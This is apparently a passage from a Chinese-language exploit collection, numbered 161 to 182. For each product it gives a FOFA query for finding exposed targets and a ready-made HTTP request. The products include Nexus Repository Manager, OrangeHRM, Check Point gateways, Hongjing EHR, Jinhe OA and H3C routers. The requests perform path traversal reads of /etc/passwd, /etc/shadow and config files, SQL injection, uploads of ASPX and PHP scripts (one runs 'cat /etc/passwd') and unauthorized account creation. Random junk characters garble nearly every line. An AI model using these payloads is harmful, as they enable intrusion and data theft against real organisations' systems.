FOFA:title="Nexus Repository Manager"7 d4 i7 V5 s7 X& L) u' q4 j
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
; t! G2 _: d, g' A( UHost: x.x.x.x2 _- ~$ M* m0 {" _1 T* S
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0$ q- H6 T( K+ f1 L0 Y: j6 z
Connection: close# L; h5 f8 O4 U9 K5 U0 }5 \4 v
Accept: */*  H, ^- V4 H5 O' H: W
Accept-Language: en8 V# u' v2 e8 K6 N8 W: t+ K. O6 c4 I* G( ]' b
Accept-Encoding: gzip( H1 @  G6 Q7 h' _; F, q. z
2 O+ T* c1 z9 G! C! x7 K
3 X, m/ T8 t& Q& Z
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
$ \' B! E/ Q6 |3 P% ^FOFA:body="/KT_Css/qd_defaul.css"6 |- @8 b/ F; ~8 X1 K4 a4 W
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密# h3 `5 j7 R- q
POST /Webservice.asmx HTTP/1.1/ N+ p- W- g& I1 U4 [/ g6 Q
Host: x.x.x.x) W0 Z% n0 D8 z4 q0 |- [, J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36/ @; G6 X; C3 X
Connection: close
  Y: U- b+ K7 F1 JContent-Length: 445+ H% S1 |1 j0 M1 @2 x; I' e  r
Content-Type: text/xml
% `8 V) X/ n% W6 nAccept-Encoding: gzip
' b# f4 a/ W0 ~
# R& i* }, s1 n* |( a/ K( B' s<?xml version="1.0" encoding="utf-8"?>7 p& N( H) b2 m# G1 c; X
<soap:Envelope xmlns:xsi="# `, t2 r) V7 G# Z+ X- v- B" ]# ]
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  R" A6 {4 L; }) Z9 }xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  g4 E; K( m) W$ t2 ]3 V0 o<soap:Body>
: ?; j  B- B. W* ]<UploadResume xmlns="http://tempuri.org/">
: B5 n6 X1 _& f7 r0 A# l- z<ip>1</ip>1 s. A, z4 D( K6 z
<fileName>../../../../dizxdell.aspx</fileName>
8 ~4 e+ \) g( ?* S. [- |; D; l& ?<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>: |' ^& J! y5 D* L- `2 n. R1 h
<tag>3</tag>- ]1 a  }% K* U( [- Y4 R
</UploadResume>
- Z  }( m- `- F5 B5 }6 U3 X5 N</soap:Body>
# S3 s! S& g% \, X$ T! P</soap:Envelope>* I) h5 L6 h( \5 B$ L+ E/ q

! k. V+ p0 J# J: W- h& U: @* l$ {3 z8 f! r* H$ ]* {3 t9 h5 i
http://x.x.x.x/dizxdell.aspx' t9 [* u$ j2 Z9 w. E* t: o6 ^
) R$ c6 ], R/ N8 e' E
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
1 L& e+ r% Z4 _/ i4 rFOFA: app="和丰山海-数字标牌"0 l7 T: y1 \& N: Z; x1 J6 }, b
POST /QH.aspx HTTP/1.1% @$ Y. N. @( q" R8 r6 D6 H, v
Host: x.x.x.x/ e/ S, S! B9 t7 ~8 j3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
3 {1 F. T8 K, X. ^7 jConnection: close/ ?; Q4 B, r% r) Y9 ?8 U3 q' k
Content-Length: 583$ f& D1 R+ b0 T9 r* p7 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
7 I* u/ n" X6 F% m/ MAccept-Encoding: gzip* R% g6 G. e) `3 a  x& _
0 W1 v5 `/ c6 E; R( N' ]1 f! `
------WebKitFormBoundaryeegvclmyurlotuey5 U# n  V/ c5 A7 Q
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"" H6 e8 X6 h2 ~
Content-Type: application/octet-stream
. F. j* r9 `6 n9 e
' u2 u9 q' v! V0 W- [# U<% response.write("ujidwqfuuqjalgkvrpqy") %>  g' x- u8 N; b' b9 d1 x
------WebKitFormBoundaryeegvclmyurlotuey& `6 [8 b+ X1 E
Content-Disposition: form-data; name="action") z9 h# r# _3 o/ h9 B# i

4 V6 Z5 a% g# @upload* B1 W6 B2 E6 p6 J: ~  N, G
------WebKitFormBoundaryeegvclmyurlotuey
( x. J: V0 [. X* r  L8 gContent-Disposition: form-data; name="responderId"
$ L2 a5 f# r: w% p
- G' k6 O) i2 s/ y* xResourceNewResponder
: b8 E) {4 N# n------WebKitFormBoundaryeegvclmyurlotuey7 Y, U- e( G8 X
Content-Disposition: form-data; name="remotePath"
% L2 B6 M& l, N, Y6 I0 [) ^9 z/ W, h4 \
/opt/resources- V4 q5 C; L  [" L- @
------WebKitFormBoundaryeegvclmyurlotuey--' ]  E9 |$ W; x% r/ s
$ p  z5 E+ D# {% Q
8 z! T) c3 V. u8 N
http://x.x.x.x/opt/resources/kjuhitjgk.aspx1 s: Q' J- B+ Z

; F+ x' T8 R2 }# D163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
- Q/ r. `( T( @5 P# C5 @- {% T: }FOFA: icon_hash="-795291075"8 G3 \! E, k$ m2 V* R. A
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1+ h, P6 Z, D# M) z# N% g
Host: x.x.x.x* L: m2 y" [+ z, e, j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.367 o. p7 s& |  D6 h! N1 b
Connection: close
" d9 e- H- ]* J# M1 cContent-Length: 293* M# a) k! c" I8 q; s
Accept: */*
( Y1 G" @/ b/ i, Q' \7 l, LAccept-Encoding: gzip, deflate! g+ [0 Z0 {7 }8 C  X
Accept-Language: zh-CN,zh;q=0.98 Y9 m9 I: U& |1 C
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod2 E* V# M- J! E: _  _

( e; C1 A7 s# V+ J, @+ ~------iiqvnofupvhdyrcoqyuujyetjvqgocod
8 g& K: S% e! @Content-Disposition: form-data; name="name"
  ?" u; k1 v4 K' C. q, l% S
7 q: z, P2 U0 I: R" @1.php
- H2 t+ z, w6 i- |4 n4 U  t4 y------iiqvnofupvhdyrcoqyuujyetjvqgocod
! Z) ^9 U: H1 C  s& `& t" wContent-Disposition: form-data; name="upfile"; filename="1.php"  t/ v' @  `$ G+ p5 H
Content-Type: image/jpeg$ G7 C! t. z! _& s0 Q5 S; J
* C  _( d6 T5 `) h8 Y. `- L# V& W
rvjhvbhwwuooyiioxega. u$ R) q- L2 p2 `+ S& U3 H. g
------iiqvnofupvhdyrcoqyuujyetjvqgocod--; p: d( Q- l0 E+ ?

) R" [' B1 ]' Z$ Q1 {, l9 o8 l% ?7 c5 t) H0 ~9 t9 M8 m# U
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
- G* D6 }, o; o) XFOFA: title="智慧综合管理平台登入"- n, b: x( j1 f) G  H5 L- P0 X& `
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
4 S) @4 @  U) a# e$ g, T% DHost: x.x.x.x
" |7 _- o' Y: h6 v- ]5 R5 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0& F" Z) i6 t  }+ ~9 [1 Y/ A7 T
Content-Length: 288" l& C8 r3 q2 g- N: s5 ~" D6 A
Accept: application/json, text/javascript, */*; q=0.01
1 J8 [8 K5 {+ e9 l  Q  D0 V' `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
5 ]( ^* f, Q# J! ?, U; QConnection: close
/ a; }. J* r9 Z! B3 Q- `Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl9 ^& ~, \  I' e; p/ \
X-Requested-With: XMLHttpRequest
9 u! s# H) _- u. |Accept-Encoding: gzip
. l4 r: e" S* s. _. b9 I$ X3 L+ n0 C, B
------dqdaieopnozbkapjacdbdthlvtlyl# q8 u* O& o& M( U5 X6 G( C
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
; J( \$ {" W0 }; t  M6 P, H" T$ ^Content-Type: image/jpeg8 K9 h$ P' x: z. T5 {/ \+ @
* E( |% z; z) q4 [" m/ u
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
0 L$ @! Z& ~* u------dqdaieopnozbkapjacdbdthlvtlyl--
2 S7 n3 d/ k% W8 [7 G; t1 N$ \& F: h0 V* ~) y

) J# l: h! \, R( T9 phttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
+ n/ d3 l* }6 M9 r/ c$ z
5 i! g2 H' x, w9 |  a% n0 Q/ i165. OrangeHRM 3.3.3 SQL 注入* h% n0 E* l% k5 ]) r* E  B! S2 ]1 ]
CVE-2024-36428
/ D8 X) r) I  t; f! ^FOFA: app="OrangeHRM-产品". v' _% \+ v7 q: c8 R% @! X
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))0 E" m. L( Z5 N, ~0 h1 y
9 G+ B5 K+ L0 \) M8 ]
9 L& C. f# T- `8 t* }  F* ~
166. 中成科信票务管理平台SeatMapHandler SQL注入
) ]+ k, H, e: O; G% GFOFA:body="技术支持:北京中成科信科技发展有限公司"; ~+ `. W, ?$ A; ~
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.14 |" f& T7 `& z* ?% ~
Host:
0 \8 D; K2 \7 pPragma: no-cache
7 f( z! I1 `( k  y, GCache-Control: no-cache
0 _# O; k; o7 D1 \0 f7 Q  W5 FUpgrade-Insecure-Requests: 1
# Q7 C' `& p0 n  M7 B+ {8 r1 CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36& z1 `+ b1 [6 _8 i8 u4 z$ q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* O6 V2 M$ n" s- w9 AAccept-Encoding: gzip, deflate
0 G6 U6 x( R& J  r  v* O& v- XAccept-Language: zh-CN,zh;q=0.9,en;q=0.8) a" a/ A! F( I0 o4 |' T
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE. O# i0 c6 F5 `+ `. ?& o% d
Connection: close
' i" q" [5 K( e6 f7 M5 c9 ?Content-Type: application/x-www-form-urlencoded: V- A: M8 \* d1 z
Content-Length: 89: f( Z) D; d: _: W" O

" p+ u  c% R0 W  gMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE) a' ?; ?$ E6 o% w

0 s. Z7 M+ n+ w* C' a
! r% u+ S0 A  T) K$ v167. 精益价值管理系统 DownLoad.aspx任意文件读取
) ?+ x" c3 @& N! l* j1 `FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
/ F2 R: U* m% MGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
4 e. b$ H$ b$ s: R: U8 ]4 YHost:
& `, ~. v4 E6 `$ q9 M* qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% j0 _; P0 B8 e# J7 J3 M# b: MContent-Type: application/x-www-form-urlencoded  m) m* t7 v( p& p  M
Accept-Encoding: gzip, deflate; s, f" E& `- k! x2 j" o+ e8 ^
Accept: */*2 }  O5 z, L+ s. A7 V
Connection: keep-alive
; _" V0 A- Z1 U$ e6 K) z
9 w# _. r! E3 v3 X8 V# [8 P
6 }: r. K& w1 u& M2 B, _168. 宏景EHR OutputCode 任意文件读取: q+ \- S% ]# ]) x" H! ^6 x( Z; r
FOFA:app="HJSOFT-HCM"
8 p, Y8 }+ v& cGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.14 u; v) Z( |0 p; U, G! N
Host: your-ip! E; J+ s9 A7 W7 P$ T  ^. I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
' L  o1 m; Y$ W) }2 f. G# VContent-Type: application/x-www-form-urlencoded
" u2 p: Z7 O% j( U, B' LConnection: close
) b# J# w' P% S. B( R* Z2 ?  H/ l6 s/ x# }8 E

8 `- Q" E- P: a7 p! P7 h: B. S. U, f, R! D0 B( S' @
169. 宏景EHR downlawbase SQL注入& J$ e3 O# q& w, V2 m
FOFA:app="HJSOFT-HCM"4 X) o5 y6 J; f2 U! [# R
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.13 y8 t* L1 z# \
Host: your-ip
! H4 L: @* w: T1 r# R* o/ O) }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- f$ S6 R- h3 s! NAccept: */*
0 `; J  O6 ~; C# q' J8 l# P& NAccept-Encoding: gzip, deflate* D4 m  Z) \% G  f) ]/ p+ l- o5 p. L' @
Connection: close9 _% M- D/ R# r
8 g; w7 t+ ?! I) p

3 |8 j2 c7 D( A7 K' w
: c) N/ ^: s- k/ r) |2 \170. 宏景EHR DisplayExcelCustomReport 任意文件读取
  n$ A* n9 ~  ?FOFA:body="/general/sys/hjaxmanage.js"& b% f& A9 V; D4 m" S" q% A: R
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.10 G; b: w' ^1 [1 x' T! Y- q- y
Host: balalanengliang! L! ?0 i5 e; U" P
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 L6 ]4 I  ^* {- f$ h2 a3 z% P
Content-Type: application/x-www-form-urlencoded+ q/ }! \0 s. K, k7 z# t7 I

1 S  P; R1 y7 o4 @filename=../webapps/ROOT/WEB-INF/web.xml9 Z8 A4 L3 F6 l. X! g/ u" h( p  k4 L
  i8 a! {2 S3 T8 e9 Q1 a1 u6 Z

0 L8 H5 @0 `' F6 r2 o171. 通天星CMSV6车载定位监控平台 SQL注入
2 I+ s: Q/ N& Q6 ^- h" _3 y5 K* bFOFA:body="/808gps/"; i' n3 Y" n/ D& Q9 E
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
& [* y7 I; d% nHost: your-ip* z9 U4 w6 {+ s! ~: E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
% [2 N# N# K7 m  A- C3 FAccept: */*' i. d6 c, C, Z! Q  F& L1 d% u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# n/ _9 B+ {4 B+ M+ J
Accept-Encoding: gzip, deflate
; O9 N4 e0 t  \' u* sConnection: close, E/ @0 n4 K, U# z" ^, ^/ V

& f$ U/ z5 |: @, ]0 Q/ r$ A6 Z8 D! B3 U1 G" L% t% o

0 G$ v3 o& T% G0 P7 X+ R172. DT-高清车牌识别摄像机任意文件读取, q) b- J! m4 @4 E: A5 l5 q; H
FOFA:app="DT-高清车牌识别摄像机"
0 Y9 y- w0 ]& f4 A3 U  R" d* N/ QGET /../../../../etc/passwd HTTP/1.1
2 g0 [0 Q, z7 qHost: your-ip
" \% t1 ~" K- T' v# J" i0 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 g- h# e7 v% J: }
Accept-Encoding: gzip, deflate
2 }6 k0 C* K2 E7 a6 }6 zAccept: */*
# ?4 e5 P# P; i6 x" I# ?+ HConnection: keep-alive
: Z5 R1 a3 c, E% _- I0 ]6 J8 W7 }& G3 K0 s1 N6 O8 x

- l1 V1 q6 y+ F0 I& ^0 Q3 ]3 h! }1 j9 N0 E# P- V
173. Check Point 安全网关任意文件读取* t$ R( a. m/ j. |
CVE-2024-24919. ]1 W9 I0 r! e9 d
FOFA:app="Check_Point-SSL-Network-Extender"
* b( K+ ~" Z. p0 G- bPOST /clients/MyCRL HTTP/1.19 j: J1 U, h0 G
Host: your-ip( n9 A6 \+ i3 f3 t; E4 E
Content-Type: application/x-www-form-urlencoded5 D+ M- \! g0 p$ u! {* F( q

6 _4 j% v1 d1 d* T: o! E/ taCSHELL/../../../../../../../etc/shadow
4 f+ }9 d- X5 q- n
7 ]! W5 Z/ W) b" m6 [. c5 z1 C3 I# K: P8 g3 q# ^( R
  g. h8 ]& t& E! ?  n
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% T, x4 E5 S# [' _5 H0 vFOFA:app="金和网络-金和OA"( G( o2 o  G0 ~$ J' A, J5 u
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1$ C1 W2 l2 Z' C
Host: your-ip
7 D+ L& ~! V) a3 l' z! A+ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# K; h6 b7 R: n7 l# X1 E: i. ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ o6 p4 q/ x8 ?4 R2 \% D
Accept-Encoding: gzip, deflate, br
* U" _9 e7 Q  K2 D' |* [6 pAccept-Language: zh-CN,zh;q=0.9
8 {0 Q$ y- Y+ K5 |) EConnection: close
9 P; ~1 ^% {1 b8 X7 |/ O
) h  C* [. w/ K  b9 V4 d% N) d. s5 M) L

2 H* P- U* Y# V8 }; X: K175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
; _4 S' W# P0 B7 }; KFOFA:app="金和网络-金和OA"8 B. I/ L# M0 D+ G8 H# k
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.15 H. W  c2 }$ y) n
Host:6 m+ t6 @- l- m+ w2 t8 L' X0 _
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 o& ]$ n$ H  A" N. D$ u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ J4 H0 b& b& w9 k5 Y+ N$ LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& u/ D1 \+ O4 r( _
Accept-Encoding: gzip, deflate
6 ?# f. d8 Z0 X5 A/ J, S' sConnection: close
9 M5 L4 T8 y# O4 n; c6 ^' Y: VUpgrade-Insecure-Requests: 1
5 Y6 I& @' @' H4 j" }7 i2 C; |: P1 z2 Y1 u+ @& Q4 V; k: \& V
5 u- E( g3 o$ ]# p% F
176. 电信网关配置管理系统 rewrite.php 文件上传
$ U0 z8 X* b- ~! _! I6 Z% KFOFA:body="img/login_bg3.png" && body="系统登录"  J* i/ V& P) h9 ~( @; z
POST /manager/teletext/material/rewrite.php HTTP/1.1
7 F  T( a  H) b; THost: your-ip, c7 m6 R7 W7 _1 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0, j, _1 s1 R* q2 g( m6 K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
. _8 y$ ~- [7 q& ?Connection: close9 s* v1 `3 Z) G  t) U9 S# z

4 s4 W8 s6 T. F* H------WebKitFormBoundaryOKldnDPT. D  S0 m" x8 o" ]! |
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
/ s+ |1 ]9 Y5 C' |: qContent-Type: image/png
% o0 t0 v3 \0 [. t& G 7 Y, X: ?9 @1 {3 I5 q' a+ C
<?php system("cat /etc/passwd");unlink(__FILE__);?>7 D9 L3 W) W; x7 i
------WebKitFormBoundaryOKldnDPT
) X$ ?' ?; p+ Z6 m  W- QContent-Disposition: form-data; name="uploadtime"! ~' X9 V0 q$ H5 Z4 E

1 m0 L0 g0 R3 V  Y 1 q8 s8 E% ?- q
------WebKitFormBoundaryOKldnDPT--
7 M1 {' w$ _1 V( E& G" G# c( b; a+ [' {9 b  ?2 G1 G
  n0 G( S/ o) h2 K! {) ]& v: v0 n

" J' N4 ~; h# h* y177. H3C路由器敏感信息泄露
. M. m: q$ V$ ~; E- |* C" a4 ], `9 `/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg* c! z' U1 @5 ^9 r7 Z; c3 C5 S
/userLogin.asp/../actionpolicy_status/../M60.cfg$ f% N( g" J3 U; _; J- M
/userLogin.asp/../actionpolicy_status/../GR8300.cfg  l. G" C& H/ [$ y5 {
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
$ y; ]9 J6 o1 L7 [/userLogin.asp/../actionpolicy_status/../GR3200.cfg& X- s/ {7 \  U  N6 B+ a# v
/userLogin.asp/../actionpolicy_status/../GR2200.cfg1 T" b, s7 [1 p' a: c9 e9 Z
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
* J/ e+ w4 S& e/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg" @$ r5 Q2 M/ s! y$ V0 W
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
9 n0 }1 q6 N9 B( U" E+ H/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
) l  o# r% @7 m5 z; W' k/ Q8 x7 O/userLogin.asp/../actionpolicy_status/../ER5200.cfg1 Q8 i3 U1 s5 ]$ z0 j
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
. P: L. F0 o3 U+ O; S& n# ?/ C8 u. [/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg. k9 Q  |/ O6 G' d( V
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
* H* ~# F' V* H& D  D9 W/ y( l/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
2 d5 T2 D: N7 U2 ^7 |/userLogin.asp/../actionpolicy_status/../ER3200.cfg
1 e; g' Z& l' [' D3 [* g/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg: v4 B% a9 P7 P  _4 x$ f
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg- T* w! E, }3 b& D
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
) b. x3 B! f* Y/ Y: `( d1 T/userLogin.asp/../actionpolicy_status/../ER3100.cfg4 F* }. o9 D/ ?& H- g* \
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
, ^" g. Q3 ]+ |4 c1 u5 C9 z# }' W1 v. C' x; B2 g* m9 o" o

( {5 G# f( k$ X5 [1 f) u; g4 D178. H3C校园网自助服务系统-flexfileupload-任意文件上传
8 o6 o: o$ T2 }  o3 r6 ~$ w& YFOFA:header="/selfservice"
% M. f) {# }' T) F. B5 J0 ?4 {POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.10 G- M' g) `$ M, X9 }* H$ J6 f, }9 C
Host:
. T& ?# R4 `: i$ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% d) o/ Q. r0 Z' D2 ~) y4 ]7 iContent-Length: 252
# E1 F/ V7 t8 c) d3 p* G9 m4 U, SAccept-Encoding: gzip, deflate
: L( K" d3 Z4 s, ?Connection: close
0 n2 Q; B+ F0 q2 S. x! w5 G! mContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
; e3 z' y# h; n-----------------aqutkea7vvanpqy3rh2l+ ?' p# ]: O0 @) _3 [/ @/ }! E
Content-Disposition: form-data; name="12234.txt"; filename="12234"
$ r7 S% n/ p) qContent-Type: application/octet-stream8 B: C! k7 N) h9 A: S4 e4 h; Z
Content-Length: 2554 U/ m1 \( l* T+ X
1 J4 P& V- W/ S+ {9 ^3 v" p  ?
12234$ A5 V% j/ a. \
-----------------aqutkea7vvanpqy3rh2l--  k+ \8 i% l4 w; H" P, C

) o  a8 i, b% v  l4 d; }) [; C0 Z( p1 v
GET /imc/primepush/%2e%2e/flex/12234.txt5 b0 N* H# D' C' A+ R4 A; o
: _. U% @2 z( H+ \1 y* R0 J
) _  G+ h& t* u! S6 G: X
179. 建文工程管理系统存在任意文件读取
& n' W2 F  T  g; TPOST /Common/DownLoad2.aspx HTTP/1.1
+ b4 `) ?) w/ m1 G- ?7 ]& I% y& aHost: {{Hostname}}1 P5 m+ f9 T5 H
Content-Type: application/x-www-form-urlencoded
  f& K: L! m" {User-Agent: Mozilla/5.0
" v# M; E1 C5 Q* I
1 H: b/ E6 y, X  Fpath=../log4net.config&Name=
+ b& a( P1 \( R1 O% K9 `4 m9 `* u. I; b" v- d0 x" f1 V" o- c

9 c+ I6 N5 |+ q# V8 {180. 帮管客 CRM jiliyu SQL注入. B" `1 I! N# ]/ F
FOFA:app="帮管客-CRM"
% c2 ~9 |9 p7 A- R2 UGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.16 e$ @% S& O) V1 c  U( U; X! b
Host: your-ip
4 J. d: V; A) |7 w/ zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ P/ a' p; O* A" uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 F$ C: b+ a  d4 s7 V/ e5 y5 y( {0 `Accept-Encoding: gzip, deflate
! M! r* K0 o' o* M! tAccept-Language: zh-CN,zh;q=0.9
% o% F$ ^: r' GConnection: close
0 }+ o, h  P$ H8 W8 Q& V! i+ ^& @
4 i/ l5 |" _% \/ @
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
9 P# r6 n& F7 d1 l4 J% e7 k0 `1 CFOFA:"PDCA/js/_publicCom.js"5 T  h& m8 ?: F" W  Y& n* q9 q
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1$ p2 Y7 h  r( h  Y& f
Host: your-ip
; p. @% ^% k' PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 }7 O; c6 x$ ]% jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- [7 a: \, P9 L. i! j3 D
Accept-Encoding: gzip, deflate, br
" A" T* {# d9 B0 x$ VAccept-Language: zh-CN,zh;q=0.95 n; T( w) ?9 H, ^; l3 }
Connection: close/ W, w3 _) W: Z7 Y9 R
Content-Type: application/x-www-form-urlencoded" f, u: {: t2 H

% B( g- C, L, T" r; r- k8 C( T: d- X' Q6 r! }; ^6 p9 j1 M
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=200 R2 ]* Z$ x# U- G( T$ R! R
" U0 W3 Q4 b- h* k- |# T; X
0 s' }, V+ y/ e1 G% g# e/ j: T5 s
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
  s' h! G% ]- e  ]FOFA:"PDCA/js/_publicCom.js"
0 _" w9 O  k  B# }  [( }POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.19 R  z; r) V( ]/ K. k0 o3 [' C
Host: your-ip" X! W& m+ ^: f) [5 I6 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
7 T  K6 D* ^( mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" P* y6 I0 @4 \6 R. \3 ]Accept-Encoding: gzip, deflate, br
+ ^8 S- q! n7 s( e5 KAccept-Language: zh-CN,zh;q=0.9; X- R6 L1 g% M% [2 C. C5 p
Connection: close
* w- l# u# s; {# g$ cContent-Type: application/x-www-form-urlencoded3 t9 X3 z, X& ^% b4 Y( O
1 Q$ ]( c: e* q% i' i2 C0 a
/ F" M4 Z2 m) c' q
username=test1234&pwd=test1234&savedays=1  ]+ S/ ^0 z8 w- Z4 v. s6 K

( T: \' y: u0 N6 N4 H
